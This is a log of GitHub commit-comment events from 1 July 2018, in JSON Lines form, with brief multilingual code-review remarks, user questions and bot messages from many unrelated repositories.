{"id":"7902917380","type":"CommitCommentEvent","actor":{"login":"ManishNetam"},"repo":{"name":"ManishNetam/ManishWebKing"},"payload":{"comment":{"id":29557733,"position":null,"line":null,"path":null,"commit_id":"d19a5eeeaf24459d21a7cbe565be0186749271a3","created_at":"2018-07-01T11:59:57Z","updated_at":"2018-07-01T11:59:57Z","author_association":"OWNER","body":"Fh"}},"created_at":"2018-07-01T11:59:57Z"}
{"id":"7902919604","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29557743,"position":178,"line":2893,"path":"proprietary-files.txt","commit_id":"663d5d10e5190b7dfbd1117849698c80966e4566","created_at":"2018-07-01T12:01:26Z","updated_at":"2018-07-01T12:01:26Z","author_association":"MEMBER","body":"duplicate entry\r\n"}},"created_at":"2018-07-01T12:01:26Z"}
{"id":"7902919752","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29557744,"position":144,"line":2854,"path":"proprietary-files.txt","commit_id":"663d5d10e5190b7dfbd1117849698c80966e4566","created_at":"2018-07-01T12:01:33Z","updated_at":"2018-07-01T12:01:33Z","author_association":"MEMBER","body":"duplicate entry\r\n"}},"created_at":"2018-07-01T12:01:33Z"}
{"id":"7902920000","type":"CommitCommentEvent","actor":{"login":"brong"},"repo":{"name":"cyrusimap/cyrus-imapd"},"payload":{"comment":{"id":29557747,"position":24,"line":174,"path":"imap/ctl_cyrusdb.c","commit_id":"a867adc23ed59c9e0ced0ffa8bcf3ebf0d557ee7","created_at":"2018-07-01T12:01:46Z","updated_at":"2018-07-01T12:01:46Z","author_association":"CONTRIBUTOR","body":"I've pushed a commit to master with an mboxname_contains_parent API"}},"created_at":"2018-07-01T12:01:46Z"}
{"id":"7902920924","type":"CommitCommentEvent","actor":{"login":"Lanchon"},"repo":{"name":"openbmap/radiocells-nlp-android"},"payload":{"comment":{"id":29557752,"position":44,"line":81,"path":"src/org/openbmap/unifiedNlp/SettingsActivity.java","commit_id":"b944a0656833248f91d2e721ca9b0ff4991b7d11","created_at":"2018-07-01T12:02:27Z","updated_at":"2018-07-01T12:02:27Z","author_association":"NONE","body":"but what if you selected deny before, the dialog wont show, only the toast.\nthats why in my bug report i suggested showing a dialog explaining how to\ngrant the permission manually. better implementations will open settings\nfor you, its all documented in the android devel site. if you are not doing\nany of that, at least add the app name to the toast, you can reference it\nfrom the resourse string. but a dialog would be better.\n"}},"created_at":"2018-07-01T12:02:27Z"}
{"id":"7902926660","type":"CommitCommentEvent","actor":{"login":"superware"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":29557774,"position":null,"line":null,"path":null,"commit_id":"3db287ba67917efd69d550a9240401f94587a845","created_at":"2018-07-01T12:06:44Z","updated_at":"2018-07-01T12:06:44Z","author_association":"NONE","body":"Hi @dagar, is it possible that after this commit POSITION_TARGET_GLOBAL_INT messages are being sent ONLY when some target has changed? 1.7.3 is sending POSITION_TARGET_GLOBAL_INT by the stream rate even if nothing changed. IMHO this is a bad idea, for example the target altitude might change, causing a single POSITION_TARGET_GLOBAL_INT send, but if that packet wasn't received by the GCS, it will know nothing about the new target."}},"created_at":"2018-07-01T12:06:44Z"}
{"id":"7902926903","type":"CommitCommentEvent","actor":{"login":"devadiab"},"repo":{"name":"devadiab/Fuse.Firebase"},"payload":{"comment":{"id":29557775,"position":null,"line":null,"path":null,"commit_id":"990f35e65c2f47b8e1147d0f111dcb779461d324","created_at":"2018-07-01T12:06:56Z","updated_at":"2018-07-01T12:06:56Z","author_association":"OWNER","body":"I think it should be triggered also by `EventEmitter` not `NativeEvent` becuase on some cases like if the on background and you clicked on notification the app will not fired the `NativeEvent` on all cases like race conditions situation so it's highly recommended to use it again using\r\n```\r\npush.on(\"receivedMessage\", function(payload) {\r\n            console.log(\"Recieved Push Notification: \" + payload);\r\n});\r\n```"}},"created_at":"2018-07-01T12:06:56Z"}
{"id":"7902931947","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29557783,"position":null,"line":null,"path":null,"commit_id":"23c6444d7c040e1160d1656dcb092a9cfe349327","created_at":"2018-07-01T12:10:45Z","updated_at":"2018-07-01T12:10:45Z","author_association":"MEMBER","body":"Problem is that stuff just doesn't output correctly, try it for yourself. These values don't pretend to be accurate, all that matters is if the aspect ratio is somewhat correct and we have an increased FOV and not too much occlusion culling going on. That is why you see me go for unorthodox values, if you go with specific resolutions, too much occlusion culling will be going on and that just doesn't look good."}},"created_at":"2018-07-01T12:10:45Z"}
{"id":"7902933597","type":"CommitCommentEvent","actor":{"login":"tramplingWillow"},"repo":{"name":"dbpedia/embeddings"},"payload":{"comment":{"id":29557787,"position":null,"line":null,"path":null,"commit_id":"1cfcc202b09f2459adf2efcb9f6a9cbff5cc9493","created_at":"2018-07-01T12:11:54Z","updated_at":"2018-07-01T12:11:54Z","author_association":"CONTRIBUTOR","body":"I have added the class for our Description Encoder, the training method and the validation method. The heuristic implemented in the network is the same as we discussed. I am yet to train the model on a larger training set."}},"created_at":"2018-07-01T12:11:54Z"}
{"id":"7902936159","type":"CommitCommentEvent","actor":{"login":"rodynenko"},"repo":{"name":"YuriiHoliuk/news-portal"},"payload":{"comment":{"id":29557789,"position":29,"line":29,"path":"src/store/middlewares/api-thunk.ts","commit_id":"59c157522f88c7185b85ad7e0c3e4016e174ad64","created_at":"2018-07-01T12:13:54Z","updated_at":"2018-07-01T12:13:54Z","author_association":"NONE","body":"можна простіше action[API_THUNK] ?"}},"created_at":"2018-07-01T12:13:54Z"}
{"id":"7902936618","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29557790,"position":3,"line":2,"path":"data/ship.txt","commit_id":"476aa4a5cee807e207a1b412ae7b8ad004f7e13a","created_at":"2018-07-01T12:14:15Z","updated_at":"2018-07-01T12:14:15Z","author_association":"NONE","body":"delayed my map for 2 days because I'm upset about the typo\r\nsmh"}},"created_at":"2018-07-01T12:14:15Z"}
{"id":"7902936839","type":"CommitCommentEvent","actor":{"login":"galegosimpatico"},"repo":{"name":"inferno8/wesnoth-Era_of_Magic"},"payload":{"comment":{"id":29557791,"position":null,"line":null,"path":null,"commit_id":"7cbb0ab9fc1c9668958d769f819ca60b170e51eb","created_at":"2018-07-01T12:14:25Z","updated_at":"2018-07-01T12:14:25Z","author_association":"CONTRIBUTOR","body":"🙇"}},"created_at":"2018-07-01T12:14:25Z"}
{"id":"7902938200","type":"CommitCommentEvent","actor":{"login":"tabnk"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29557795,"position":null,"line":null,"path":null,"commit_id":"23c6444d7c040e1160d1656dcb092a9cfe349327","created_at":"2018-07-01T12:15:29Z","updated_at":"2018-07-01T12:15:29Z","author_association":"NONE","body":"I’m build locally with the following \r\n\r\n{\r\n         \"reicast_internal_resolution\",\r\n         \"Internal resolution (restart); 640x480|1280x960|**1920x1080**|2560x1440|3200x2400|3840x2160|4480x3360|5120x3840|5760x4320|6400x4800|7040x5280|7680x5760|8320x6240|8960x6720|9600x7200|10240x7680|10880x8160|11520x8640|12160x9120|12800x9600\",\r\n      },\r\n\r\nLook great on my screen. \r\n\r\nNot sure about occlusion culling though.\r\n"}},"created_at":"2018-07-01T12:15:29Z"}
{"id":"7902939168","type":"CommitCommentEvent","actor":{"login":"rodynenko"},"repo":{"name":"YuriiHoliuk/news-portal"},"payload":{"comment":{"id":29557798,"position":17,"line":17,"path":"src/utils/http.ts","commit_id":"59c157522f88c7185b85ad7e0c3e4016e174ad64","created_at":"2018-07-01T12:16:17Z","updated_at":"2018-07-01T12:16:17Z","author_association":"NONE","body":"token ліпше зберігати в cookies. LocalStore недоступний в private mode."}},"created_at":"2018-07-01T12:16:17Z"}
{"id":"7902939982","type":"CommitCommentEvent","actor":{"login":"cleopasrotich"},"repo":{"name":"cleopasrotich/Udacity-Project"},"payload":{"comment":{"id":29557799,"position":null,"line":null,"path":null,"commit_id":"abc15e270c164ca489080ead1c09088a48be05cf","created_at":"2018-07-01T12:17:00Z","updated_at":"2018-07-01T12:17:00Z","author_association":"OWNER","body":"screenshot to the webpage."}},"created_at":"2018-07-01T12:17:00Z"}
{"id":"7902941483","type":"CommitCommentEvent","actor":{"login":"cristinacke28"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557800,"position":null,"line":null,"path":null,"commit_id":"ec67aeec3970024805a06e07c2b24e92121332b5","created_at":"2018-07-01T12:18:16Z","updated_at":"2018-07-01T12:18:16Z","author_association":"NONE","body":"How do you run multiple instances on windows?\r\nCreating token1.txt token2.txt ... tokenX.txt will work?"}},"created_at":"2018-07-01T12:18:16Z"}
{"id":"7902941577","type":"CommitCommentEvent","actor":{"login":"herpaderpaldent"},"repo":{"name":"eveseat/web"},"payload":{"comment":{"id":29557801,"position":null,"line":null,"path":null,"commit_id":"804f54136dc63ff4843db7879f9357312c470aa9","created_at":"2018-07-01T12:18:20Z","updated_at":"2018-07-01T12:18:20Z","author_association":"CONTRIBUTOR","body":"because i found 13.37 to be pretty elite.\r\n\r\n(and also cause wrote this, and i am meming sometimes: https://www.urbandictionary.com/define.php?term=1337 ) "}},"created_at":"2018-07-01T12:18:20Z"}
{"id":"7902942680","type":"CommitCommentEvent","actor":{"login":"tibik"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557802,"position":null,"line":null,"path":null,"commit_id":"ec67aeec3970024805a06e07c2b24e92121332b5","created_at":"2018-07-01T12:19:18Z","updated_at":"2018-07-01T12:19:18Z","author_association":"NONE","body":"@cristinacke28 you can use multiple folders"}},"created_at":"2018-07-01T12:19:18Z"}
{"id":"7902943439","type":"CommitCommentEvent","actor":{"login":"SoYoung210"},"repo":{"name":"SoYoung210/acmicpc_note"},"payload":{"comment":{"id":29557803,"position":23,"line":23,"path":"DS/samsung/Main.java","commit_id":"390e2acc371ce55390585e04fc0f4c21b7766a37","created_at":"2018-07-01T12:19:55Z","updated_at":"2018-07-01T12:19:55Z","author_association":"OWNER","body":"굳이 0으로 초기화 하는 작업이 필요한가요 ? 에러 방지 차원이라면,\r\n```Java\r\nPoint() {\r\n\r\n}\r\n```\r\n이면 될것 같습니다. "}},"created_at":"2018-07-01T12:19:55Z"}
{"id":"7902944122","type":"CommitCommentEvent","actor":{"login":"tibik"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557805,"position":null,"line":null,"path":null,"commit_id":"ec67aeec3970024805a06e07c2b24e92121332b5","created_at":"2018-07-01T12:20:25Z","updated_at":"2018-07-01T12:20:25Z","author_association":"NONE","body":"or console windows with \r\n\r\nphp cheat.php token1 accountid1\r\nphp cheat.php token1 accountid2\r\netc"}},"created_at":"2018-07-01T12:20:25Z"}
{"id":"7902945894","type":"CommitCommentEvent","actor":{"login":"issamarmas"},"repo":{"name":"issamarmas/oronge"},"payload":{"comment":{"id":29557806,"position":null,"line":null,"path":null,"commit_id":"6cb9f87f40945bebf434b488d924404aae657953","created_at":"2018-07-01T12:21:48Z","updated_at":"2018-07-01T12:21:48Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-01T12:21:48Z"}
{"id":"7902946053","type":"CommitCommentEvent","actor":{"login":"issamarmas"},"repo":{"name":"issamarmas/oronge"},"payload":{"comment":{"id":29557807,"position":null,"line":null,"path":null,"commit_id":"6cb9f87f40945bebf434b488d924404aae657953","created_at":"2018-07-01T12:21:59Z","updated_at":"2018-07-01T12:21:59Z","author_association":"OWNER","body":"جيد\r\n"}},"created_at":"2018-07-01T12:21:59Z"}
{"id":"7902946783","type":"CommitCommentEvent","actor":{"login":"SoYoung210"},"repo":{"name":"SoYoung210/acmicpc_note"},"payload":{"comment":{"id":29557810,"position":40,"line":40,"path":"DS/samsung/Main.java","commit_id":"390e2acc371ce55390585e04fc0f4c21b7766a37","created_at":"2018-07-01T12:22:33Z","updated_at":"2018-07-01T12:22:33Z","author_association":"OWNER","body":"밑에 메인함수에 있던 내용을 메소드로 분리하고 싶으셨던 것 같은데, 마저 한번 메소드로 ..! "}},"created_at":"2018-07-01T12:22:33Z"}
{"id":"7902946834","type":"CommitCommentEvent","actor":{"login":"golfapipol"},"repo":{"name":"golfapipol/golang-database"},"payload":{"comment":{"id":29557812,"position":5,"line":4,"path":"src/main/main.go","commit_id":"fde849307b2c79388f93508651e64629c5c66691","created_at":"2018-07-01T12:22:35Z","updated_at":"2018-07-01T12:22:35Z","author_association":"OWNER","body":"ใช้ apiLibrary เพราะ\r\nตัวแปร api ใน main ชนกับชื่อ package"}},"created_at":"2018-07-01T12:22:35Z"}
{"id":"7902946968","type":"CommitCommentEvent","actor":{"login":"SteveEbey73742"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29557813,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-01T12:22:43Z","updated_at":"2018-07-01T12:22:43Z","author_association":"NONE","body":"I run fedora, it might be the files are not in the expected location for fedora to find."}},"created_at":"2018-07-01T12:22:43Z"}
{"id":"7902947022","type":"CommitCommentEvent","actor":{"login":"DanielRuf"},"repo":{"name":"JadeTao/csgo-cli"},"payload":{"comment":{"id":29557814,"position":null,"line":null,"path":null,"commit_id":"488a40a5437d837bd928e6ebee1ae980baede40f","created_at":"2018-07-01T12:22:45Z","updated_at":"2018-07-01T12:22:45Z","author_association":"CONTRIBUTOR","body":"Hm, seems there is some TypeScript related issue. Should I check this? Does not seem to be related to cli-table3."}},"created_at":"2018-07-01T12:22:45Z"}
{"id":"7902953725","type":"CommitCommentEvent","actor":{"login":"Arias800"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29557834,"position":null,"line":null,"path":null,"commit_id":"fa0e36a7960b4d237f713a992b062187e25fc2c3","created_at":"2018-07-01T12:28:09Z","updated_at":"2018-07-01T12:28:09Z","author_association":"CONTRIBUTOR","body":"Peut être que c'est lier a Kodi 18 mais au pire c'est pas grave c'est pas gênant ^^"}},"created_at":"2018-07-01T12:28:09Z"}
{"id":"7902956184","type":"CommitCommentEvent","actor":{"login":"yanhaishixian"},"repo":{"name":"Moonshile/ChineseWordSegmentation"},"payload":{"comment":{"id":29557837,"position":null,"line":null,"path":null,"commit_id":"2cd3373da08fcdeb7e0f6b6a009bdfda4dd5c052","created_at":"2018-07-01T12:29:56Z","updated_at":"2018-07-01T12:29:56Z","author_association":"NONE","body":"Thank you very much！\r\nI sovled the problem following your advice. @bung87 "}},"created_at":"2018-07-01T12:29:56Z"}
{"id":"7902960505","type":"CommitCommentEvent","actor":{"login":"ioanae18"},"repo":{"name":"alexandrucurcubat/PentaStagiuVara2018Homework-1"},"payload":{"comment":{"id":29557849,"position":null,"line":null,"path":null,"commit_id":"a33591c28dd551653fe86659aa2efa9789e2aa55","created_at":"2018-07-01T12:33:10Z","updated_at":"2018-07-01T12:33:10Z","author_association":"NONE","body":"Multumesc!!"}},"created_at":"2018-07-01T12:33:10Z"}
{"id":"7902961205","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29557851,"position":null,"line":null,"path":null,"commit_id":"a72d1342e0204497a0b650c98f7bfccf05a59736","created_at":"2018-07-01T12:33:45Z","updated_at":"2018-07-01T12:33:45Z","author_association":"OWNER","body":"It need to be tested. I don't remember why it was not saved."}},"created_at":"2018-07-01T12:33:45Z"}
{"id":"7902961925","type":"CommitCommentEvent","actor":{"login":"SoYoung210"},"repo":{"name":"SoYoung210/acmicpc_note"},"payload":{"comment":{"id":29557854,"position":null,"line":null,"path":null,"commit_id":"390e2acc371ce55390585e04fc0f4c21b7766a37","created_at":"2018-07-01T12:34:19Z","updated_at":"2018-07-01T12:34:19Z","author_association":"OWNER","body":"좀 벗어난 이야기 이지만, \r\n`public static void main(String args[]) throws Exception {` 이렇게 쓰셨으니\r\n\r\n```Java\r\nwhile (!q.isEmpty())\r\n{\r\n``` \r\n이 코드도\r\n\r\n```Java\r\nwhile (!q.isEmpty()) {\r\n```\r\n같은 방식이 더 바람직 합니다. "}},"created_at":"2018-07-01T12:34:19Z"}
{"id":"7902963596","type":"CommitCommentEvent","actor":{"login":"ManishNetam"},"repo":{"name":"ManishNetam/About"},"payload":{"comment":{"id":29557861,"position":null,"line":null,"path":null,"commit_id":"463dda7d929fd2b9e64e7a59a9a5a71e2c11bcd8","created_at":"2018-07-01T12:35:41Z","updated_at":"2018-07-01T12:35:41Z","author_association":"OWNER","body":"Nice"}},"created_at":"2018-07-01T12:35:41Z"}
{"id":"7902965809","type":"CommitCommentEvent","actor":{"login":"mokrachaika"},"repo":{"name":"BGftw97/hello-world"},"payload":{"comment":{"id":29557865,"position":null,"line":null,"path":null,"commit_id":"272d6ade1b9a8033cc16965b8736b9c59481bd91","created_at":"2018-07-01T12:37:18Z","updated_at":"2018-07-01T12:37:18Z","author_association":"NONE","body":"probvah treta ama mi dava 0 ot 100 "}},"created_at":"2018-07-01T12:37:18Z"}
{"id":"7902965877","type":"CommitCommentEvent","actor":{"login":"mpickering"},"repo":{"name":"bgamari/head.hackage"},"payload":{"comment":{"id":29557866,"position":10,"line":10,"path":"patches/tagged-0.8.5.patch","commit_id":"299ebbecaad1f163365e610b3647ee6e5030585a","created_at":"2018-07-01T12:37:20Z","updated_at":"2018-07-01T12:37:20Z","author_association":"NONE","body":"This is not a patch against the pristine version."}},"created_at":"2018-07-01T12:37:20Z"}
{"id":"7902967790","type":"CommitCommentEvent","actor":{"login":"dscho"},"repo":{"name":"git-for-windows/git"},"payload":{"comment":{"id":29557867,"position":null,"line":null,"path":null,"commit_id":"cd1a74fc9dc8a07626c216940db9a51f25206e03","created_at":"2018-07-01T12:38:49Z","updated_at":"2018-07-01T12:38:49Z","author_association":"MEMBER","body":"@hechaozong Care to explain yourself?"}},"created_at":"2018-07-01T12:38:49Z"}
{"id":"7902969158","type":"CommitCommentEvent","actor":{"login":"jhwohlgemuth"},"repo":{"name":"jhwohlgemuth/env"},"payload":{"comment":{"id":29557868,"position":null,"line":null,"path":null,"commit_id":"a13338f70d657bb13e2bf146c87c8678a5bfeb88","created_at":"2018-07-01T12:39:53Z","updated_at":"2018-07-01T12:39:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add atom plugins](https://trello.com/c/EWZX5Zd1/181-add-atom-plugins)"}},"created_at":"2018-07-01T12:39:53Z"}
{"id":"7902970345","type":"CommitCommentEvent","actor":{"login":"BGftw97"},"repo":{"name":"BGftw97/hello-world"},"payload":{"comment":{"id":29557869,"position":null,"line":null,"path":null,"commit_id":"055419f63242f71566f01138fffcaf079f68547f","created_at":"2018-07-01T12:40:46Z","updated_at":"2018-07-01T12:40:46Z","author_association":"OWNER","body":"30 MINUTI\r\n"}},"created_at":"2018-07-01T12:40:46Z"}
{"id":"7902970989","type":"CommitCommentEvent","actor":{"login":"BGftw97"},"repo":{"name":"BGftw97/hello-world"},"payload":{"comment":{"id":29557874,"position":null,"line":null,"path":null,"commit_id":"508aeb428b36232ed606daa6b0494270639d1252","created_at":"2018-07-01T12:41:20Z","updated_at":"2018-07-01T12:41:20Z","author_association":"OWNER","body":"WHY SO"}},"created_at":"2018-07-01T12:41:20Z"}
{"id":"7902972043","type":"CommitCommentEvent","actor":{"login":"mokrachaika"},"repo":{"name":"BGftw97/hello-world"},"payload":{"comment":{"id":29557876,"position":null,"line":null,"path":null,"commit_id":"272d6ade1b9a8033cc16965b8736b9c59481bd91","created_at":"2018-07-01T12:42:14Z","updated_at":"2018-07-01T12:42:14Z","author_association":"NONE","body":"pri teb 3-ta stana li ?  "}},"created_at":"2018-07-01T12:42:14Z"}
{"id":"7902972648","type":"CommitCommentEvent","actor":{"login":"Kerrung"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29557877,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-01T12:42:41Z","updated_at":"2018-07-01T12:42:41Z","author_association":"NONE","body":"@SteveEbey73742 I run Arch Linux"}},"created_at":"2018-07-01T12:42:41Z"}
{"id":"7902976127","type":"CommitCommentEvent","actor":{"login":"l2dy"},"repo":{"name":"mquinson/po4a"},"payload":{"comment":{"id":29557882,"position":5,"line":183,"path":"CONTRIBUTING.md","commit_id":"df79e8c6c2088b6528f0082a1ede4adf58de10cb","created_at":"2018-07-01T12:45:17Z","updated_at":"2018-07-01T12:45:17Z","author_association":"CONTRIBUTOR","body":"Is this space a typo?"}},"created_at":"2018-07-01T12:45:17Z"}
{"id":"7902976669","type":"CommitCommentEvent","actor":{"login":"BiaChaudhry"},"repo":{"name":"BiaChaudhry/stringProcessorModulePython"},"payload":{"comment":{"id":29557884,"position":null,"line":null,"path":null,"commit_id":"df580af8fc7fcad036d6977d3ec620c71d2fe82b","created_at":"2018-07-01T12:45:40Z","updated_at":"2018-07-01T12:45:40Z","author_association":"OWNER","body":"New processing function can be added into this for improvement."}},"created_at":"2018-07-01T12:45:40Z"}
{"id":"7902976909","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29557885,"position":null,"line":null,"path":null,"commit_id":"d9b3bdfbbe1f1caf32ad49e1401d0d82543a518b","created_at":"2018-07-01T12:45:51Z","updated_at":"2018-07-01T12:45:51Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n{\n  \"AnyOf\": \\[\n    {\n      \"AnyOf\": \\[\n        \"queue:create\\-task:highest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:very\\-high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:medium:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:very\\-low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:lowest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\"\n      \\]\n    },\n    {\n      \"AnyOf\": \\[\n        \"queue:create\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        {\n          \"AllOf\": \\[\n            \"queue:define\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n            \"queue:task\\-group\\-id:taskcluster\\-github/V59I7DWiT7i4n8L82E4xdg\",\n            \"queue:schedule\\-task:taskcluster\\-github/V59I7DWiT7i4n8L82E4xdg/V59I7DWiT7i4n8L82E4xdg\"\n          \\]\n        }\n      \\]\n    }\n  \\]\n}\n\nYou have the scopes:\n\n```\n\\[\n  \"assume:project:taskcluster:mozilla\\-github\\-repository\",\n  \"assume:repo:github.com/servo/servo:pull\\-request\",\n  \"notify:email:\\*\",\n  \"notify:irc\\-channel:\\*\",\n  \"notify:irc\\-user:\\*\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/github\\-worker\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/github\\-worker\\-windows\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/servo\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/win2012r2\",\n  \"queue:route:garbage.\\*\",\n  \"queue:route:index.garbage.\\*\",\n  \"queue:route:notify.email.\\*\",\n  \"queue:route:notify.irc\\-channel.\\*\",\n  \"queue:route:notify.irc\\-user.\\*\",\n  \"queue:scheduler\\-id:taskcluster\\-github\",\n  \"secrets:get:garbage/\\*\",\n  \"secrets:set:garbage/\\*\"\n\\]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": \\[\n    {\n      \"AnyOf\": \\[\n        {\n          \"AllOf\": \\[\n            \"queue:scheduler\\-id:taskcluster\\-github\",\n            {\n              \"AnyOf\": \\[\n                \"queue:create\\-task:highest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:very\\-high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:medium:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:very\\-low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:lowest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\"\n              \\]\n            }\n          \\]\n        },\n        {\n          \"AnyOf\": \\[\n            \"queue:create\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n            {\n              \"AllOf\": \\[\n                \"queue:define\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:task\\-group\\-id:taskcluster\\-github/V59I7DWiT7i4n8L82E4xdg\",\n                \"queue:schedule\\-task:taskcluster\\-github/V59I7DWiT7i4n8L82E4xdg/V59I7DWiT7i4n8L82E4xdg\"\n              \\]\n            }\n          \\]\n        }\n      \\]\n    }\n  \\]\n}\n```\n----\nmethod:     createTask\nerrorCode:  InsufficientScopes\nstatusCode: 403\ntime:       2018-07-01T12:45:50.962Z\n\n</details>"}},"created_at":"2018-07-01T12:45:51Z"}
{"id":"7902977488","type":"CommitCommentEvent","actor":{"login":"weineran"},"repo":{"name":"danny1000008/bond"},"payload":{"comment":{"id":29557886,"position":5,"line":23,"path":"main.py","commit_id":"ca2c1edd018a40c82bc3c62b97f715b2ddec8aa8","created_at":"2018-07-01T12:46:20Z","updated_at":"2018-07-01T12:46:20Z","author_association":"NONE","body":"Consider avoiding abbreviations (e.g. what does get_con_abbr mean?)"}},"created_at":"2018-07-01T12:46:20Z"}
{"id":"7902978303","type":"CommitCommentEvent","actor":{"login":"Catherine-wzx"},"repo":{"name":"merenlab/oligotyping"},"payload":{"comment":{"id":29557887,"position":null,"line":null,"path":null,"commit_id":"588b0d267dbaaae28c7cf62de9e0ed9f60903c27","created_at":"2018-07-01T12:46:59Z","updated_at":"2018-07-01T12:46:59Z","author_association":"NONE","body":"Excuse，when I used this code,it was an error.\r\n\r\nIt showed as follows: \r\nFile \"o-stackbar.R\", line 28\r\n    options <- arguments$options\r\n                        ^\r\nSyntaxError: invalid syntax\r\n\r\n"}},"created_at":"2018-07-01T12:46:59Z"}
{"id":"7902981977","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29557891,"position":null,"line":null,"path":null,"commit_id":"f5633657ffb07a27965f6189c115f53600f8f5a1","created_at":"2018-07-01T12:49:51Z","updated_at":"2018-07-01T12:49:51Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 671](https://travis-ci.org/per1234/arduino-ci-script/builds/398798502) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00671-001-tsv"}},"created_at":"2018-07-01T12:49:51Z"}
{"id":"7902982117","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29557893,"position":null,"line":null,"path":null,"commit_id":"f5633657ffb07a27965f6189c115f53600f8f5a1","created_at":"2018-07-01T12:49:56Z","updated_at":"2018-07-01T12:49:56Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 671](https://travis-ci.org/per1234/arduino-ci-script/builds/398798502) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00671"}},"created_at":"2018-07-01T12:49:56Z"}
{"id":"7902982764","type":"CommitCommentEvent","actor":{"login":"ebichiki"},"repo":{"name":"ebichiki/assessment"},"payload":{"comment":{"id":29557895,"position":null,"line":null,"path":null,"commit_id":"59421f0e05774931582794fbbca2e6b6d4e650f1","created_at":"2018-07-01T12:50:13Z","updated_at":"2018-07-01T12:50:13Z","author_association":"OWNER","body":"#1 に対する対応を行いました"}},"created_at":"2018-07-01T12:50:13Z"}
{"id":"7902984304","type":"CommitCommentEvent","actor":{"login":"weineran"},"repo":{"name":"danny1000008/bond"},"payload":{"comment":{"id":29557896,"position":4,"line":96,"path":"bond.py","commit_id":"ca2c1edd018a40c82bc3c62b97f715b2ddec8aa8","created_at":"2018-07-01T12:51:04Z","updated_at":"2018-07-01T12:51:04Z","author_association":"NONE","body":"Python code typically uses Snake Case (https://en.wikipedia.org/wiki/Snake_case) rather than camel case"}},"created_at":"2018-07-01T12:51:04Z"}
{"id":"7902987197","type":"CommitCommentEvent","actor":{"login":"joestr"},"repo":{"name":"joestr/ZoneMenu"},"payload":{"comment":{"id":29557900,"position":57,"line":53,"path":"src/main/java/xyz/joestr/zonemenu/ZoneMenu.java","commit_id":"388c183b44dc9a5e56543df4b34947a26cfd77c4","created_at":"2018-07-01T12:52:52Z","updated_at":"2018-07-01T12:52:52Z","author_association":"OWNER","body":"hab ich nicht gesehen, wird nächstes mal eingebaut"}},"created_at":"2018-07-01T12:52:52Z"}
